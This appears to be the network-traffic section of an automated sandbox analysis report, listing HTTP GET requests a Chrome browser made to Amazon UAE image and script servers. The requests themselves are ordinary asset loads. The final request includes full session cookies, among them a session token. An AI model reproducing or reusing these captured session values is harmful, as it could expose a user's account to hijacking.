    Source: global trafficHTTP traffic detected: GET /images/I/51BqsgbDI7L.js?AUIClients/CardJsRuntimeBuzzCopyBuild HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/AE-hq/2022/img/Sports/XCM_Manual_1521089_5259758_400x400_2X._CB617696541_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/AE-hq/2022/img/Sports/XCM_Manual_1521089_5259751_400x400_2X._CB617696541_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/home/janiceo/dqc_experiment/xcm_banners_tr_bts21_372x232_pp-0zvf9_372x232_ae-en._SY116_CB643136714_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/home/janiceo/dqc_experiment/xcm_banners_tr_bts21_372x232_pp-ezsdz_372x232_ae-en._SY116_CB643136719_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/11y85pohsPL._RC%7C41JZmnaIUdL.js_.js?AUIClients/AmazonGatewayAuiAssets HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/AE-hq/2022/img/Sports/XCM_Manual_1521089_5259736_400x400_2X._CB617696541_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/11B2bsTfmvL._RC%7C11Y+5x+kkTL.js,51XFQXG4llL.js,11yKORv-GTL.js,11GgN1+C7hL.js,01+z+uIeJ-L.js,01VRMV3FBdL.js,21BJeD9yjcL.js,01meRT+S4PL.js,11aD5q6kNBL.js,11rRjDLdAVL.js,51LGf0aHP5L.js,11nAhXzgUmL.js,11UNP9ncXuL.js,113pYUOav3L.js,11uo7qXoO3L.js,01VhK3jZdbL.js,21eKR4hvwNL.js,01Q4S7ptbiL.js,51XuQjpKb8L.js,01JYHc2oIlL.js,31nfKXylf6L.js,01ktRCtOqKL.js,21xlsLy-PNL.js,11bEz2VIYrL.js,31o2NGTXThL.js,01rpauTep4L.js,315n+VmgJ3L.js,01tvglXfQOL.js,11jxZ9ouCoL.js,01fBsnBQx0L.js_.js?AUIClients/AmazonUI&88n9Ttiw HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/0152SLDk8CL.js?AUIClients/OctopusBrowsePageAssets HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.amazon.aesec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/11Hy-4jiUaL.css?xcp HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/11Q6G8iTFZL.css?xcp HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/41U8j6G8JZL.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/consumables_uae/Amazonbasket/XCM_Manual_1532278_5307764_400x39_2X._CB616351825_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/S/sash/MV5yNztdnPUc5FB.png HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/01n49fullPL.js HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/S/sash/McBZv0ZvnbehkIx.png HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/411x8BHUrFL._RC%7C71xP0umV4JL.js,01gK5H1EnXL.js,01phmzCOwJL.js,01eOvPdxG7L.js,71xoLvkbbjL.js,41jBieyCvYL.js,01wXnKULArL.js,01+pnQJuQ0L.js,21fcR05bSUL.js,41rnk3z1gYL.js,51H8vCDt+dL.js,31J-NEfNY0L.js,11lEMI5MhIL.js,31+UifI0MIL.js,71-pKfDl0GL.js,41aCLC6fiuL.js,01VYGE8lGhL.js_.js?AUIClients/NavDesktopUberAsset&HUTipDuy HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/home/janiceo/dqc_experiment/xcm_banners_tr_bts21_372x232_pp-d9le7_372x232_ae-en._SY116_CB643136704_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/home/janiceo/dqc_experiment/xcm_banners_tr_bts21_372x232_pp-vubbe_372x232_ae-en._SY116_CB643136714_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2020/img/Apparel/XCM_CUTTLE_1230335_1213328_UAE_3151165_153x125_en_AE._SY116_CB428587699_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2020/img/Apparel/XCM_CUTTLE_1230335_1213331_UAE_3151168_153x125_en_AE._SY116_CB428587699_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2020/img/Apparel/XCM_Manual_1224505_1174644_UAE_3096775_153x125_2X_en_AE._SY116_CB431807455_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/41iWa0vZ9RL.AC_SX250.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/41WTONCfm9L.AC_SX250.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/41ooHWqimYL.AC_SX250.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/41UwiqzW6eL.AC_SX250.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2020/img/Apparel/XCM_CUTTLE_1230335_1213334_UAE_3151164_153x125_en_AE._SY116_CB428587698_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/electronics/store/kamja/WebQC/2021/TVs/Feb_Smart_1x._SY116_CB659039472_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/electronics/store/kamja/WebQC/2021/TVs/Feb_4K_1x._SY116_CB659039472_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/electronic/kamja/Events/2024/BTS24/PH1/Nav/OFC/bts_ofc_01_writing_en._CB568181090_.png HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/electronics/store/kamja/WebQC/2021/TVs/Feb_Large_1x._SY116_CB659039472_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/electronic/kamja/Events/2024/BTS24/PH1/Nav/OFC/bts_ofc_03_electronics_en._CB568181090_.png HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/electronics/store/kamja/WebQC/2021/TVs/Feb_Under1999_1x._SY116_CB659039472_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/21XkqMc0FHL.js?xcp HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.amazon.aesec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/01/blank/1x1_b._V192262818_.gif HTTP/1.1Host: images-na.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://images-eu.ssl-images-amazon.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2024/img/Consumer_Electronics/XCM_CUTTLE_1741561_3919943_379x304_1X_en_AE._SY304_CB566685890_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/electronic/kamja/Events/2024/BTS24/PH1/Nav/OFC/bts_ofc_06_planners_en._CB568181090_.png HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/01/blank/1x1_b._V192262818_.gif HTTP/1.1Host: images-na.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/11+d9I1l9AL.js?xcp HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/electronic/kamja/Events/2024/BTS24/PH1/Nav/OFC/bts_ofc_02_school_en._CB568181090_.png HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/Merchandising/BudgetStore/XCM_Manual_1349259_3986223_UAE_Budget_Store_AE_xsite_grocery_en_400x400_2X._CB644457599_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/electronic/kamja/Events/2024/BTS24/PH1/bts24_L2_header_web_en.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/Merchandising/BudgetStore/XCM_Manual_1349259_3986211_UAE_Budget_Store_AE_xsite_baby_essentials_en_400x400_2X._CB644457596_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/0152SLDk8CL.js?AUIClients/OctopusBrowsePageAssets HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/electronic/kamja/Events/2024/BTS24/PH1/Nav/OFC/bts_ofc_05_notebook_en._CB568181090_.png HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/electronic/kamja/Events/2024/BTS24/PH1/Nav/OFC/bts_ofc_04_paper_en._CB568181090_.png HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/51TvQK5HLrL.AC_SX250.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/41RqroVv0XL.AC_SX250.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/21XkqMc0FHL.js?xcp HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /1/events/com.amazon.eel.SearchAutocompleteUIServiceMetrics.nexus HTTP/1.1Host: unagi.amazon.aeConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=258-1179333-9864664; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=259-0026151-5947772; session-token=E6VpY3m60fUZcb6s8YCvLawniyUbsva8N6eIM6U974LXoVJwSQS+Ipu2nRRVeG2G6JhswsBbyT1i8jzCKv+Ac75i7UrXd7yLPyWJQvOgmrfLF0DC3KMgqrqZknDnVted0FL6kb10JOvNpwsKjRIb/2lITYNAzTyyCN04Or6y8RHZAT5vKBz/ZNuNA/kD7Rwnhx7LP692odU2scBQFICodmh5nsZoBsPeyDo1OUJavQWYKbrL+XHGDZqP3jQrJnGl07Bl+5ZNpdiitmJsxdzfjWdwI0Anq9GsMLV6rSrdrF/MjB7lUF/PBOOJ/F2BZ04vFuDlPFsVZ8fiYkHR6zI+th8f6RVQc1TY
